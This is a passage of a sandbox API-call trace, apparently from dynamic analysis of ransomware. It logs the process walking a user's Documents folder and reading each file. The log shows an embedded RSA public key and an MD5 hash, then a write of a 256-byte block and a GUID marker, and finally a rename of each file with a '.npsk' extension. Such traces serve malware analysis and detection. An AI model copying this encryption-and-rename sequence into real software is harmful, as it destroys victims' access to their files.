hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.566] GetLastError () returned 0x0 [0215.566] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.566] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.566] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.566] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.566] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.567] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.567] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x902e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.567] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.568] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.568] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.568] CloseHandle (hObject=0x61c) returned 1 [0215.572] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MxfHp.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxfhp.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MxfHp.ppt.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxfhp.ppt.npsk")) returned 1 [0215.574] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0215.574] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0215.574] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0215.574] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0215.574] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0215.574] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92e9ad00, ftCreationTime.dwHighDateTime=0x1d5d862, ftLastAccessTime.dwLowDateTime=0x602052a0, ftLastAccessTime.dwHighDateTime=0x1d5dcb5, ftLastWriteTime.dwLowDateTime=0x602052a0, ftLastWriteTime.dwHighDateTime=0x1d5dcb5, nFileSizeHigh=0x0, nFileSizeLow=0x16f1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rd9dikUFlBmXFe1qsoy.pps", cAlternateFileName="RD9DIK~1.PPS")) returned 1 [0215.574] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rd9dikUFlBmXFe1qsoy.pps") returned=".pps" [0215.574] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rd9dikUFlBmXFe1qsoy.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rd9dikuflbmxfe1qsoy.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.575] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=93982) returned 1 [0215.575] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.577] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x16ef8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.577] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.579] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x16f1e, lpOverlapped=0x0) returned 1 [0215.580] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.580] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.580] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.580] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.581] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.581] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.582] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.582] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.582] GetLastError () returned 0x0 [0215.582] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.582] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.582] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.582] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.582] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.583] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.583] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x16f1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.584] WriteFile (in: hFile=0x61c, lpBuffer=0x3214a10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3214a10*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.584] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.584] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.584] CloseHandle (hObject=0x61c) returned 1 [0215.591] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rd9dikUFlBmXFe1qsoy.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rd9dikuflbmxfe1qsoy.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rd9dikUFlBmXFe1qsoy.pps.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rd9dikuflbmxfe1qsoy.pps.npsk")) returned 1 [0215.593] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1124e10, ftCreationTime.dwHighDateTime=0x1d5dea1, ftLastAccessTime.dwLowDateTime=0x3fa8a7d0, ftLastAccessTime.dwHighDateTime=0x1d5dcfa, ftLastWriteTime.dwLowDateTime=0x3fa8a7d0, ftLastWriteTime.dwHighDateTime=0x1d5dcfa, nFileSizeHigh=0x0, nFileSizeLow=0x1732, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="StTqzP2 bVx.rtf", cAlternateFileName="STTQZP~1.RTF")) returned 1 [0215.593] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\StTqzP2 bVx.rtf") returned=".rtf" [0215.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\StTqzP2 bVx.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sttqzp2 bvx.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.598] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=5938) returned 1 [0215.598] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.599] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x170c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.599] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.601] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x1732, lpOverlapped=0x0) returned 1 [0215.602] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.602] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.602] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.602] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.603] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.603] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.603] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.603] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.603] GetLastError () returned 0x0 [0215.604] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.604] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.604] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.604] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.604] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.604] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.604] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1732, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.604] WriteFile (in: hFile=0x61c, lpBuffer=0x3214a10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3214a10*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.605] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.605] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.605] CloseHandle (hObject=0x61c) returned 1 [0215.611] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\StTqzP2 bVx.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sttqzp2 bvx.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\StTqzP2 bVx.rtf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sttqzp2 bvx.rtf.npsk")) returned 1 [0215.613] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17f7b0c0, ftCreationTime.dwHighDateTime=0x1d5dbe5, ftLastAccessTime.dwLowDateTime=0xcbece920, ftLastAccessTime.dwHighDateTime=0x1d5d897, ftLastWriteTime.dwLowDateTime=0xcbece920, ftLastWriteTime.dwHighDateTime=0x1d5d897, nFileSizeHigh=0x0, nFileSizeLow=0xc8ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sUBwSOUxzs1.pptx", cAlternateFileName="SUBWSO~1.PPT")) returned 1 [0215.613] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sUBwSOUxzs1.pptx") returned=".pptx" [0215.613] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sUBwSOUxzs1.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\subwsouxzs1.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.615] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=51455) returned 1 [0215.615] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.617] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc8d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.617] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.619] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xc8ff, lpOverlapped=0x0) returned 1 [0215.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.620] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.621] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.621] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.621] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.621] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.621] GetLastError () returned 0x0 [0215.621] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.621] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.621] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.621] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.621] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.622] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.622] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc8ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.623] WriteFile (in: hFile=0x61c, lpBuffer=0x3214a10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3214a10*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.623] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.623] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.623] CloseHandle (hObject=0x61c) returned 1 [0215.627] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sUBwSOUxzs1.pptx" (normalized: "c:\\users\\5p5nrgjn0js 